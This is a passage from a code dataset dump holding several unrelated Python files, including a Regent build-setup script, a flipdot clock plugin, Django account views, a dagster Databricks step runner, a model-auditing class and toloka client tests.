hdf_dir, e)\n        else:\n            check_dirty_build('hdf', hdf_build_result, hdf_dir)\n        if not cache:\n            assert os.path.exists(hdf_build_result)\n\n    if not cache:\n        build_regent(root_dir, legion_use_cmake, cmake_exe,\n                     gasnet_release_dir, llvm_install_dir, terra_dir, hdf_install_dir,\n                     conduit, thread_count)\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description='Setup tool for Regent.')\n    parser.add_argument(\n        '--prefix', dest='prefix_dir', required=False,\n        help='Directory in which to install dependencies.')\n    parser.add_argument(\n        '--scratch', dest='scratch_dir', required=False,\n        help='Directory in which to store temporary build files.')\n    parser.add_argument(\n        '--cache-only', 
dest='cache', action='store_true',\n        help='Only cache downloads (do not install).')\n    parser.add_argument(\n        '--skip-certificate-check', dest='insecure', action='store_true',\n        default=discover_skip_certificate_check(),\n        help='Skip certificate checks on downloads.')\n    parser.add_argument(\n        '--cmake', dest='legion_use_cmake', action='store_true',\n        default=os.environ.get('USE_CMAKE') == '1',\n        help='Use CMake to build Legion.')\n    parser.add_argument(\n        '--llvm-version', dest='llvm_version', required=False, choices=('35', '38', '39', '60'),\n        default=discover_llvm_version(),\n        help='Select LLVM version.')\n    parser.add_argument(\n        '--terra-url', dest='terra_url', required=False,\n        default='https://github.com/StanfordLegion/terra.git',\n        help='URL of Terra repository to clone from.')\n    parser.add_argument(\n        '--terra-branch', dest='terra_branch', required=False,\n        default='luajit2.1',\n        help='Branch of Terra repository to checkout.')\n    args = parser.parse_args()\n    driver(**vars(args))\n","sub_path":"language/scripts/setup_env.py","file_name":"setup_env.py","file_ext":"py","file_size_in_byte":21192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557957205","text":"import datetime\nfrom flask import render_template, request, redirect, url_for\nimport pytz\nfrom pyflipdot.display import TextDisplay\nfrom pyflipdot.plugins import Plugin\nfrom pyflipdot.web.admin import PluginView\nfrom pyflipdot.web.view import MenuFlaskView\nimport pyflipdot.main\n__author__ = 'teddydestodes'\n__plugin_name__ = 'Clock View'\n__version__ = '0.1'\n\nclass ClockPlugin(Plugin):\n\n    def __init__(self):\n        super().__init__()\n        self._tz = pytz.timezone(ClockPlugin.get_config('timezone', 'Europe/Berlin'))\n        self._format = ClockPlugin.get_config('format', '{day:02d}.{month:02d}.{year:04d} {hour:02d}:{minute:02d}:{second:02d}')\n\n    def draw(self, display):\n        if isinstance(display, TextDisplay):\n            self._draw_text(display)\n\n    def tick(self):\n        pass\n\n    def _reload(self):\n        self._tz = pytz.timezone(ClockPlugin.get_config('timezone', 'Europe/Berlin'))\n        self._format = ClockPlugin.get_config('format', '{day:02d}.{month:02d}.{year:04d} {hour:02d}:{minute:02d}:{second:02d}')\n\n    def _draw_text(self, display):\n        cdate = pytz.utc.localize(datetime.datetime.utcnow()).astimezone(self._tz)\n        text = self._format.format(hour=cdate.hour, minute=cdate.minute, second=cdate.second,\n                                   day=cdate.day, month=cdate.month, year=cdate.year)\n        display.set_text(text)\n\npyflipdot.main.VIEWS['clock'] = ClockPlugin\n\nclass ClockPluginView(MenuFlaskView):\n    route_base = 'clock'\n    menu_name = 'Clock'\n\n    def index(self):\n        config = {'timezone': ClockPlugin.get_config('timezone', 'Europe/Berlin'),\n                  'format': ClockPlugin.get_config('format',\n                                                   '{day:02d}.{month:02d}.{year:04d} {hour:02d}:{minute:02d}:{second:02d}')}\n        return render_template('plugins/clock/clock.html', config=config)\n\n    def post(self):\n        ClockPlugin.set_config('timezone', request.form.get('timezone'))\n        ClockPlugin.set_config('format', request.form.get('format'))\n        ClockPlugin.reload()\n        return redirect(url_for('ClockPluginView:index'))\n\nPluginView.clock = ClockPluginView\n","sub_path":"pyflipdot/plugins/clock/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"381598644","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import 
reverse\nfrom django.contrib.auth import login, logout, authenticate\n# from django.contrib.auth.forms import UserCreationForm\n\nfrom .forms import UserCreateForm, UserProfileForm\n\n\ndef logout_view(request):\n    \"\"\"Log the user out.\"\"\"\n    logout(request)\n    return HttpResponseRedirect(reverse('dog_vaycay:index'))\n\n\ndef register(request):\n    if request.method != 'POST':\n        # display blank registration form\n        form = UserCreateForm()\n    else:\n        # process complete form\n        form = UserCreateForm(data=request.POST)\n\n        if form.is_valid():\n            new_user = form.save()\n            authenticated_user = authenticate(username=new_user.username,\n                                              password=request.POST['password1'])\n            login(request, authenticated_user)\n            return HttpResponseRedirect(reverse('dog_vaycay:index'))\n\n    context = {'form': form}\n    return render(request, 'accounts/register.html', context)\n\n\ndef profile(request):\n    if request.method != 'POST':\n        # display blank profile form\n        form = UserProfileForm()\n    else:\n        # process complete form\n        form = UserProfileForm(request.POST)\n\n        if form.is_valid():\n            profile = form.save(commit=False)\n            profile.owner = request.user\n            # save the instance that the owner was attached to\n            profile.save()\n            return HttpResponseRedirect(reverse('dog_vaycay:index'))\n\n    context = {'form': form}\n    return render(request, 'accounts/user_profile.html', context)\n\n\n\"\"\"\ndef profile(request):\n    if request.method == \"POST\":\n        form = UserProfile(request.POST)\n        if form.is_valid():\n            form.save()\n            return HttpResponseRedirect(reverse('dog_vaycay:index'))\n    else:\n        form = UserProfile()\n\n    context = {'form': form}\n    return render(request, 'accounts/user_profile.html', context)\n\"\"\"","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"208724037","text":"n = input()\r\n\r\nalphabet = []\r\nnum = 0\r\nfor i in range(len(n)):\r\n    if n[i].isdigit():\r\n        num += int(n[i])\r\n    else:\r\n        alphabet.append(n[i])\r\nalphabet.sort()\r\n\r\n# if at least one digit exists, append the digit sum at the very end\r\nif num != 0:\r\n    alphabet.append(str(num))\r\n\r\n# print the final result\r\n# ''.join(list): converts a list into a string\r\nprint(''.join(alphabet))\r\n\r\n\r\n# Dongbin-na's version\r\n#\r\n# data = input()\r\n# result = []\r\n# value = 0\r\n#\r\n# # check each character one at a time\r\n# for x in data:\r\n#     # if it is a letter, append it to the result list\r\n#     if x.isalpha():\r\n#         result.append(x)\r\n#     # sum the digits separately\r\n#     else:\r\n#         value += int(x)\r\n#\r\n# # sort the letters in ascending order\r\n# result.sort()\r\n#\r\n# # if at least one digit exists, append the sum at the very end\r\n# if value != 0:\r\n#     result.append(str(value))\r\n#\r\n# # print the final result\r\n# print(''.join(result))\r\n","sub_path":"ALGORITHM/BAEKJOON/SOURCE/02. Implemented(구현)/4. 문자의 재정렬.py","file_name":"4. 
문자의 재정렬.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323077176","text":"\"\"\"LifoQueue, one of the queues used for multithreading\"\"\"\n\n\"\"\"\n    The defining feature of LifoQueue is LIFO (last in, first out): items are\n    both enqueued and dequeued at the tail of the queue.\n    A last-in-first-out queue is really just a stack.\n    From 《图解Python》 (Illustrated Python)\n\"\"\"\nfrom queue import LifoQueue\n\nlq = LifoQueue()\n\nlq.put('obj1')\nlq.put('obj2')\nlq.put('obj3')\n\nprint(lq.get())  # obj3\nprint(lq.get())  # obj2\nprint(lq.get())  # obj1\n","sub_path":"17_process_thread/48_7_multithread_lifequeque.py","file_name":"48_7_multithread_lifequeque.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557010967","text":"\"\"\"The main entrypoint for ops executed using the DatabricksPySparkStepLauncher.\n\nThis script is launched on Databricks using a `spark_python_task` and is passed the following\nparameters:\n\n- the DBFS path to the pickled `step_run_ref` file\n- the DBFS path to the zipped dagster job\n- paths to any other zipped packages which have been uploaded to DBFS.\n\"\"\"\n\nimport os\nimport pickle\nimport site\nimport sys\nimport tempfile\nimport zipfile\n\nfrom dagster.core.execution.plan.external_step import PICKLED_EVENTS_FILE_NAME, run_step_from_ref\nfrom dagster.core.instance import DagsterInstance\nfrom dagster.serdes import serialize_value\n\n# This won't be set in Databricks but is needed to be non-None for the\n# Dagster step to run.\nif \"DATABRICKS_TOKEN\" not in os.environ:\n    os.environ[\"DATABRICKS_TOKEN\"] = \"\"\n\n\ndef main(\n    step_run_ref_filepath,\n    setup_filepath,\n    dagster_job_zip,\n):\n    # Extract any zip files to a temporary directory and add that temporary directory\n    # to the site path so the contained files can be imported.\n    #\n    # We can't rely on pip or other packaging tools because the zipped files might not\n    # even be Python packages.\n    with tempfile.TemporaryDirectory() as tmp:\n\n        with zipfile.ZipFile(dagster_job_zip) as zf:\n            zf.extractall(tmp)\n        site.addsitedir(tmp)\n\n        # We can use regular local filesystem APIs to access DBFS inside the Databricks runtime.\n        with open(setup_filepath, \"rb\") as handle:\n            databricks_config = pickle.load(handle)\n\n        # sc and dbutils are globally defined in the Databricks runtime.\n        databricks_config.setup(dbutils, sc)  # noqa pylint: disable=undefined-variable\n\n        with open(step_run_ref_filepath, \"rb\") as handle:\n            step_run_ref = pickle.load(handle)\n        print(\"Running dagster job\")  # noqa pylint: disable=print-call\n        with DagsterInstance.ephemeral() as instance:\n            events = list(run_step_from_ref(step_run_ref, instance))\n\n    events_filepath = os.path.dirname(step_run_ref_filepath) + \"/\" + PICKLED_EVENTS_FILE_NAME\n    with open(events_filepath, \"wb\") as handle:\n        pickle.dump(serialize_value(events), handle)\n\n\nif __name__ == \"__main__\":\n    main(sys.argv[1], sys.argv[2], sys.argv[3])\n","sub_path":"python_modules/libraries/dagster-databricks/dagster_databricks/databricks_step_main.py","file_name":"databricks_step_main.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"151652490","text":"import unittest\nfrom automatedsearch import AutomatedSearch\nimport urllib.request as ur\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\n\n\nclass TestScrapping(unittest.TestCase):\n    website = 
\"https://kinetics.nist.gov/kinetics/index.jsp\"\n    react_name = \"(CH3)3COOh\"\n    automated_search = AutomatedSearch(website, react_name)\n\n    def run_tests(self):\n        \"\"\"Run all of the tests in this module.\"\"\"\n\n        loader = unittest.TestLoader()\n        suite = unittest.TestSuite()\n        # add tests to the test suite\n        suite.addTests(loader.loadTestsFromModule(self))\n        # initialize a runner, pass it your suite and run it\n        runner = unittest.TextTestRunner(verbosity=3)\n        runner.run(suite)\n\n    def test_search(self):\n        self.react_name = \"(CH3)3COOho\"\n        self.automated_search = AutomatedSearch(self.website, self.react_name)\n        expected = pd.DataFrame({\"reactants\": [(\"CH(OCH3)3\", \"·F\"), (\"CH(OCH3)3\", \"·OH\")], \"products\": [(\"Trimethoxymethane\", \"radical\", \"HF\"), (\"Trimethoxymethane\", \"radical\", \"H2O\")], \"rate_reaction\": [\"8.314472\", \"8.314472\"]})\n        results = self.automated_search.search()\n        assert_frame_equal(expected, results)\n\n    def test_search_length(self):\n        size = len(self.automated_search.search())\n        self.assertEqual(size, 19)\n\n    def test_send_key_match(self):\n        reactions_web_element, record_number = self.automated_search.send_key(self.website, self.react_name)\n        self.assertEqual(len(reactions_web_element), 19)\n        self.assertEqual(int(record_number), 39)\n\n    def test_send_key_not_match(self):\n        # pass the callable and its arguments separately so that assertRaises\n        # can invoke it itself and catch the expected exception\n        self.assertRaises(NameError, self.automated_search.send_key, self.website, \"amcharhal\")\n\n    def test_html_parse(self):\n        link_elements = ['https://kinetics.nist.gov/kinetics/ReactionSearch?r0=7732185&r1='\n                         '590389143&r2=0&r3=0&r4=0&p0=79414&p1=7732185&p2=7732185&p3=0&p4=0&'\n                         'expandResults=true&']\n        read = ur.urlopen(link_elements[0])\n        soup = BeautifulSoup(read, 'html.parser')\n        results = self.automated_search.html_parse(link_elements)[0]\n        self.assertAlmostEqual(len(str(soup)), len(str(results)))\n\n    def test_html_navigate(self):\n        read = ur.urlopen(\"https://kinetics.nist.gov/kinetics/ReactionSearch?r0=7732185&r1=590389143&r2=0&r3=0&r4=0&p0=79414&p1=7732185&p2=7732185&p3=0&p4=0&expandResults=true&\")\n        soup = BeautifulSoup(read, 'html.parser')\n        results = self.automated_search.html_navigate(soup)\n        expected = {\"reactants\": ('H2O', 'CH2=C(CH3)-CH(OH)(OOH)'), \"products\": ('CH2=C(CH3)COOH', 'H2O', 'H2O'), \"rate_reaction\": str(8.314472)}\n        self.assertEqual(results, expected)\n\n\n","sub_path":"venv/include/testscrapping.py","file_name":"testscrapping.py","file_ext":"py","file_size_in_byte":2751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"415760885","text":"# -*- coding: utf8 -*-\n\nfrom .models import NoticiaInterna, NoticiaExterna\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\n\n\ndef NoticiasIndex(request):\n    context = RequestContext(request)\n    noticia_interna = NoticiaInterna.objects.all()\n    noticia_externa = NoticiaExterna.objects.all()\n\n    listado = {\n        'ni': noticia_interna,\n        'ne': noticia_externa,\n    }\n    return render_to_response('prensa/noticias.html', listado, context)\n","sub_path":"intranet_raiz/prensa/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"516535982","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Main module.\"\"\"\nimport warnings\nfrom collections import Counter\nfrom math import sqrt\n\nimport mlprimitives\nimport numpy as np\nfrom mlblocks import MLPipeline\nfrom scipy.stats import entropy\nfrom sklearn import metrics\nfrom 
sklearn.model_selection import KFold\nfrom sklearn.neighbors import NearestNeighbors\nimport pandas as pd\nfrom cardea.modeling.modeler import Modeler\n\n\nclass ModelAuditor():\n    __name__ = 'ModelAuditor'\n\n    def run_fold(self, features_train, target, feature_test, primitive, hyperparameters=None):\n        '''Runs Kfold cross-validation where it predicts all the primitives within the pipeline.\n\n        Args:\n            features_train: the training features.\n            feature_test: the testing features.\n            target: a list of the folds targets.\n            primitive: the machine learning primitive to run.\n            hyperparameters: the hyperparameters of the given primitives.\n\n        Returns:\n            A list of the folds' results for the primitives that are passed.\n        '''\n\n        # assert that the features and targets have the same size\n        modeler = Modeler()\n        #pipeline = self.create_pipeline(primitive, hyperparameters)\n        pipeline = modeler.create_pipeline(primitive, hyperparameters)\n        last_block_in_pipeline = list(pipeline.blocks.values())[-1]\n        #Add an if statement based on the type of output for the last block (array, ndarray, DataFrame)\n        for output in last_block_in_pipeline.produce_output:\n            check_name = output['name'] == 'X' or output['name'] == 'y'\n            check_numpy = output['type'] == 'array' or output['type'] == 'ndarray'\n            check_pandas = output['type'] == 'DataFrame' or output['type'] == 'Series'\n            if check_name and (check_numpy or check_pandas):\n                features_train = pd.DataFrame(features_train)\n                feature_test = pd.DataFrame(feature_test)\n                target = pd.Series(target)\n                return modeler.fit_predict_model(features_train, target, feature_test, pipeline)\n        return None\n\n    def generate_kfolds(self, features, target, n_folds=10):\n        '''Creates Kfold cross-validation for the given features and targets\n\n        Args:\n            features: The features as a numpy array to create the k-folds for\n            target: a list of the folds targets\n            n_folds: the number of folds to create\n\n        Returns:\n            a tuple that consists of two values, the folds features and the folds targets\n        '''\n        kf = KFold(n_splits=n_folds, shuffle=True)\n        folds_features = []\n        folds_targets = []\n        for train_index, test_index in kf.split(features):\n            X_train = features[train_index]\n            X_test = features[test_index]\n            y_train = target[train_index]\n            y_test = target[test_index]\n            folds_features.append([X_train, X_test])\n            folds_targets.append([y_train, y_test])\n\n        return folds_features, folds_targets\n\n    def execute_pipeline(self, pipeline_primitives, features_train, target,\n                         features_test, problem_type, hyperparameters=None,\n                         with_intermediate=False):\n        '''Executes a pipeline and generates all the intermediates of the pipeline.\n\n        Args:\n            pipeline_primitives: Array of the pipeline primitives.\n            features_train: the training features data to run through the pipeline.\n            features_test: the testing features data to run through the pipeline.\n            target: The target of the training data to run through the pipeline.\n            problem_type: the type of the problem (classification or regression).\n            hyperparameters: the hyperparameters to run for the model\n            with_intermediate: A boolean to add or ignore the intermediates metrics.\n\n        Returns:\n            a list with the prediction results of each executed (partial) pipeline.\n        '''\n        pipeline_intermediates = []\n        if with_intermediate:\n            all_partial_primitives = [pipeline_primitives[:index] for index in range(1, len(pipeline_primitives) + 1)]\n        else:\n            all_partial_primitives = [pipeline_primitives]\n        for partial_primitives in all_partial_primitives:\n            pipeline_results 
= self.run_fold(features_train, target,\n features_test, partial_primitives,\n hyperparameters)\n\n #if pipeline_results != None:\n pipeline_intermediates.append(pipeline_results)\n\n return pipeline_intermediates\n\n def report_regression_result(self, actual, predicted):\n '''Reports the prediction results for a regression model.\n\n Args:\n actual: A 1d list of the target variable for the actual test data.\n predicted: A 1d list of the prediction result.\n\n Returns:\n A json object of various evaluation metrics for regression.\n '''\n metrics_to_calculate = [['explained_variance_score', metrics.explained_variance_score],\n ['mean_absolute_error', metrics.mean_absolute_error],\n ['mean_squared_error', metrics.mean_squared_error],\n ['mean_squared_log_error', metrics.mean_squared_log_error],\n ['median_absolute_error', metrics.median_absolute_error],\n ['r2_score', metrics.r2_score]]\n results_dict = {}\n for metric in metrics_to_calculate:\n try:\n results_dict[metric[0]] = metric[1](actual, predicted)\n except BaseException:\n warnings.warn(\n '{} can\\'t be calculated for this data'.format(metric[0]),\n UserWarning)\n return results_dict\n\n def report_classification_result(self, actual, predicted):\n '''Reports the prediction results for a classification model.\n\n Args:\n actual: A 1d list of the target variable for the actual test data.\n predicted: A 1d list of the prediction result.\n n_class: Int of the number of classes in the classification problem.\n prediction_proba: The classes prediction probabilities that are\n produced by predict_proba.\n\n\n Returns:\n A json object of various evaluation metrics for classification.\n '''\n metrics_to_calculate = [['accuracy', metrics.accuracy_score],\n ['f1', metrics.f1_score],\n ['precision', metrics.precision_score],\n ['recall', metrics.recall_score],\n ['class_count', Counter]]\n results_dict = {}\n for metric in metrics_to_calculate:\n try:\n if metric[0] == 'accuracy':\n results_dict[metric[0]] = metric[1](actual, predicted)\n elif metric[0] == 'class_count':\n counter_dict = metric[1](predicted)\n label_count_sum = sum(counter_dict.values())\n for label in counter_dict.keys():\n results_dict['{}_{}'.format(metric[0], str(\n label))] = counter_dict[label] / label_count_sum\n else:\n results_dict['{}_macro'.format(metric[0])] = metric[1](\n actual, predicted, average='macro')\n except BaseException:\n warnings.warn(\n '{} can\\'t be calculated for this data'.format(metric[0]),\n UserWarning)\n return results_dict\n\n def euclidean_distance(self, x, y):\n '''Computes the euclidean distance between two vectors.\n\n Args:\n x: The first vector.\n y: The second vector.\n\n Returns:\n The euclidean distance.\n '''\n return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))\n\n def intermediate_metrics(self, intermediate):\n '''Generates metrics of the intermediates (features data in-between primitives).\n\n Args:\n intermediate: The intermediate data that must be investigated (for a single fold).\n\n Returns:\n A Summary metrics for the different data columns in the intermediate.\n '''\n if type(intermediate) != pd.DataFrame:\n intermediate = pd.DataFrame(intermediate)\n summary = {}\n for column_name in list(intermediate.columns):\n intermediate_column = intermediate[column_name]\n col_metrics = {}\n col_metrics['index'] = column_name\n \n col_metrics['perc_25'] = np.percentile(intermediate_column, 25)\n col_metrics['perc_50'] = np.percentile(intermediate_column, 50)\n col_metrics['perc_75'] = np.percentile(intermediate_column, 75)\n \n 
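The euclidean_distance helper above is the plain generator form of the L2 norm; a quick sanity check against numpy, using made-up vectors:

from math import sqrt
import numpy as np

def euclidean_distance(x, y):
    # same formula as the method above, outside the class
    return sqrt(sum(pow(a - b, 2) for a, b in zip(x, y)))

x, y = [1.0, 2.0, 3.0], [4.0, 6.0, 3.0]
assert np.isclose(euclidean_distance(x, y), np.linalg.norm(np.array(x) - np.array(y)))  # both 5.0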
col_metrics['variance'] = np.var(intermediate_column)\n col_metrics['std'] = np.std(intermediate_column)\n \n col_metrics['entropy'] = entropy(intermediate_column)\n\n summary[column_name] = col_metrics\n return summary\n\n def find_k_nearest_neighbors(self, data, instance, k=5):\n '''Finds the k-nearest neighbors from the data to an instance.\n\n Args:\n data: The data that will be searched to find the nearest neighbors.\n instance: the instance that needs to identify its nearest neighbors.\n k: the number of nearest neighbors to consider.\n\n Returns:\n Array of the k nearest neighbors to the instance.\n '''\n nbrs = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(data)\n distances, indices = nbrs.kneighbors([instance])\n\n return data[indices]\n\n def summarize_nearest_neighbors(self, folds_features, folds_targets, k=5):\n '''Summarizes the nearest neighbors of a sample in the data.\n\n Args:\n folds_features: The folds containing the training and testing of the features data.\n folds_targets: The folds containing the training and testing of the target data.\n k: the number of nearest neighbors to consider\n\n Returns:\n Summary of all the features for the nearest neighbors.\n '''\n nearest_neighbors_summary = []\n for x, y in zip(folds_features, folds_targets):\n X_train = x[0]\n X_test = x[1]\n y_test = y[1]\n\n indices_to_select = np.random.choice(range(len(X_test)), k, replace=False)\n chosen_instances_features = X_test[indices_to_select]\n chosen_instances_targets = y_test[indices_to_select]\n fold_nearest_neighbors_summary = []\n for instance_features, instance_target in zip(\n chosen_instances_features, chosen_instances_targets):\n nearest_neighbors = self.find_k_nearest_neighbors(X_train, instance_features, k)\n neighbors_summary = self.intermediate_metrics(nearest_neighbors)\n fold_nearest_neighbors_summary.append({'instance_features': instance_features,\n 'instance_target': instance_target,\n 'neighbors_summary': neighbors_summary})\n\n nearest_neighbors_summary.append(fold_nearest_neighbors_summary)\n\n return nearest_neighbors_summary\n\n def generate_pipeline_report(self, pipeline_primitives, features,\n target, problem_type, hyperparameters = None,\n with_intermediates_metrics = False,\n with_nearest_neighbors = False):\n '''Generates the full report of the model auditor in a json format.\n\n Args:\n pipeline_primitives: Array of the pipeline primitives to run.\n features: The features data to run through the pipeline.\n target: The target data to run through the pipeline.\n problem_type: The type of the problem (classification or regression).\n hyperparameters: Specify parameters that must be specified in the primitives.\n with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.\n with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.\n\n Returns:\n A json file of the model auditing results.\n '''\n\n report = {}\n # Generate the folds\n columns_names = list(features.columns)\n features = np.array(features)\n target = np.array(target)\n folds_features, folds_targets = self.generate_kfolds(features, target)\n # create the intermediates\n intermediates_list = []\n for x, y in zip(folds_features, folds_targets):\n X_train = pd.DataFrame(x[0],columns = columns_names)\n X_test = pd.DataFrame(x[1],columns = columns_names)\n y_train = y[0]\n fold_intermediates_list = self.execute_pipeline(pipeline_primitives, X_train,\n y_train, X_test, problem_type,\n with_intermediate = with_intermediates_metrics,\n hyperparameters 
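find_k_nearest_neighbors relies on scikit-learn's NearestNeighbors; a short sketch on random toy data. Note that kneighbors([instance]) returns indices of shape (1, k), so data[indices] is 3-D and generally needs a squeeze to (k, n_features) before a DataFrame-based summary such as intermediate_metrics will accept it:

import numpy as np
from sklearn.neighbors import NearestNeighbors

data = np.random.randn(50, 3)              # toy training features
instance = data[0]                         # query point

nbrs = NearestNeighbors(n_neighbors=5, algorithm='ball_tree').fit(data)
distances, indices = nbrs.kneighbors([instance])
neighbors = data[indices].squeeze(axis=0)  # shape (5, 3)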
= hyperparameters)\n intermediates_list.append(fold_intermediates_list)\n\n # print(intermediates_list)\n output_result = []\n if problem_type == 'classification':\n for actual, predicted in zip(folds_targets, intermediates_list):\n fold_result = self.report_classification_result(actual[1], predicted[-1])\n output_result.append(fold_result)\n elif problem_type == 'regression':\n for actual, predicted in zip(folds_targets, intermediates_list):\n fold_result = self.report_regression_result(actual[1], predicted[-1])\n output_result.append(fold_result)\n report['output_result'] = output_result\n\n if with_intermediates_metrics:\n intermediates_metrics = {}\n for fold in intermediates_list:\n for idx,intermediate in enumerate(fold[:-1]):\n intermediate_key = str(idx)+ '.' + pipeline_primitives[idx]\n try:\n intermediate_result = self.intermediate_metrics(intermediate)\n intermediates_metrics[intermediate_key] = intermediate_result\n except BaseException as e:\n print(e.args)\n warnings.warn(\n 'intermediate metrics can\\'t be calculated for {}'.format(intermediate_key),\n UserWarning)\n report['intermediates_result'] = intermediates_metrics\n\n if with_nearest_neighbors:\n nearest_neighbors = self.summarize_nearest_neighbors(folds_features, folds_targets, k=5)\n report['nearest_neighbors'] = nearest_neighbors\n\n return report\n\n def generate_pipeline_report_with_test(self, pipeline_primitives, features,\n target, test, actual, problem_type, hyperparameters = None,\n with_intermediates_metrics = False,\n with_nearest_neighbors = False):\n\n '''Generates the full report of the model auditor in a json format.\n\n Args:\n pipeline_primitives: Array of the pipeline primitives to run.\n features: The features data to run through the pipeline.\n target: The target data to run through the pipeline.\n problem_type: The type of the problem (classification or regression).\n hyperparameters: Specify parameters that must be specified in the primitives.\n with_nearest_neighbors: A boolean to add or ignore the nearest neighbors metrics.\n with_intermediates_metrics: A boolean to add or ignore the intermediates metrics.\n\n Returns:\n A json file of the model auditing results.\n '''\n\n report = {}\n # Generate the folds\n columns_names = list(features.columns)\n X_train = np.array(features)\n y_train = np.array(target)\n\n X_test = np.array(test)\n y_test = np.array(actual)\n\n # print(\"X_train \", X_train.shape)\n # print(\"y_train \", y_train.shape)\n # print(\"X_test \", X_test.shape)\n # print(\"y_test \", y_test.shape)\n\n y_pred = self.execute_pipeline(pipeline_primitives, X_train, y_train, X_test, problem_type,\n with_intermediate=False,\n hyperparameters=hyperparameters)\n\n output_result = []\n if problem_type == 'classification':\n fold_result = self.report_classification_result(y_test, y_pred[-1])\n output_result.append(fold_result)\n elif problem_type == 'regression':\n fold_result = self.report_regression_result(y_test, y_pred[-1])\n output_result.append(fold_result)\n report['output_result'] = output_result\n\n if with_nearest_neighbors:\n nearest_neighbors = self.summarize_nearest_neighbors(X_test, y_test, k=5)\n report['nearest_neighbors'] = nearest_neighbors\n\n return report\n\n","sub_path":"notebooks/research/model_audit.py","file_name":"model_audit.py","file_ext":"py","file_size_in_byte":17636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"146598035","text":"import datetime\nfrom operator import itemgetter\nimport logging\nfrom 
urllib.parse import urlparse, parse_qs\n\nimport pytest\nimport toloka.client as client\n\n\ndef test_find_pools(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n raw_result = {'items': [pool_map_with_readonly], 'has_more': False}\n\n def pools(request, context):\n assert {\n 'project_id': ['10'],\n 'id_gt': ['20'],\n 'last_started_lt': ['2016-03-23T12:59:00'],\n 'sort': ['created,-id'],\n } == parse_qs(urlparse(request.url).query)\n return raw_result\n\n requests_mock.get(f'{toloka_url}/pools', json=pools)\n\n # Request object syntax\n request = client.search_requests.PoolSearchRequest(\n project_id='10',\n id_gt='20',\n last_started_lt=datetime.datetime(2016, 3, 23, 12, 59, 0),\n )\n sort = client.search_requests.PoolSortItems(['created', '-id'])\n result = toloka_client.find_pools(request, sort=sort)\n assert raw_result == client.unstructure(result)\n\n # Expanded syntax\n result = toloka_client.find_pools(\n project_id='10',\n id_gt='20',\n last_started_lt=datetime.datetime(2016, 3, 23, 12, 59, 0),\n sort=['created', '-id'],\n )\n assert raw_result == client.unstructure(result)\n\n\ndef test_get_pools(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n pools = [dict(pool_map_with_readonly, id=str(i)) for i in range(100)]\n pools.sort(key=itemgetter('id'))\n expected_pools = [pool for pool in pools if pool['id'] > '20']\n\n def get_pools(request, context):\n params = parse_qs(urlparse(request.url).query)\n id_gt = params.pop('id_gt')[0]\n assert {\n 'project_id': ['10'],\n 'last_started_lt': ['2016-03-23T12:59:00'],\n 'sort': ['id'],\n } == params\n\n items = [pool for pool in pools if id_gt is None or pool['id'] > id_gt][:3]\n return {'items': items, 'has_more': items[-1]['id'] != pools[-1]['id']}\n\n requests_mock.get(f'{toloka_url}/pools', json=get_pools)\n\n # Request object syntax\n request = client.search_requests.PoolSearchRequest(\n project_id='10',\n id_gt='20',\n last_started_lt=datetime.datetime(2016, 3, 23, 12, 59, 0),\n )\n result = toloka_client.get_pools(request)\n assert expected_pools == client.unstructure(list(result))\n\n # Expanded syntax\n result = toloka_client.get_pools(\n project_id='10',\n id_gt='20',\n last_started_lt=datetime.datetime(2016, 3, 23, 12, 59, 0),\n )\n assert expected_pools == client.unstructure(list(result))\n\n\ndef test_get_pool(requests_mock, toloka_client, toloka_url, pool_map_with_readonly):\n requests_mock.get(f'{toloka_url}/pools/21', json=pool_map_with_readonly)\n assert pool_map_with_readonly == client.unstructure(toloka_client.get_pool('21'))\n\n\ndef test_get_pool_training(requests_mock, toloka_client, toloka_url, training_pool_map):\n requests_mock.get(f'{toloka_url}/pools/22', json=training_pool_map)\n assert training_pool_map == client.unstructure(toloka_client.get_pool('22'))\n\n\ndef test_create_pool(requests_mock, toloka_client, toloka_url, pool_map, pool_map_with_readonly, caplog):\n\n def pools(request, context):\n assert pool_map == request.json()\n return pool_map_with_readonly\n\n requests_mock.post(f'{toloka_url}/pools', json=pools, status_code=201)\n pool = client.structure(pool_map, client.pool.Pool)\n with caplog.at_level(logging.INFO):\n caplog.clear()\n result = toloka_client.create_pool(pool)\n assert caplog.record_tuples == [(\n 'toloka.client', logging.INFO,\n 'A new pool with ID \"21\" has been created. 
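The get_pools mock above encodes a cursor-style paging contract: the client re-requests with id_gt set to the last id it has seen, until has_more is false. The same contract as a plain loop, with a hypothetical fetch_page standing in for one GET /pools call:

def fetch_all(fetch_page):
    items, id_gt = [], None
    while True:
        page = fetch_page(id_gt)           # returns {'items': [...], 'has_more': bool}
        items.extend(page['items'])
        if not page['has_more']:
            return items
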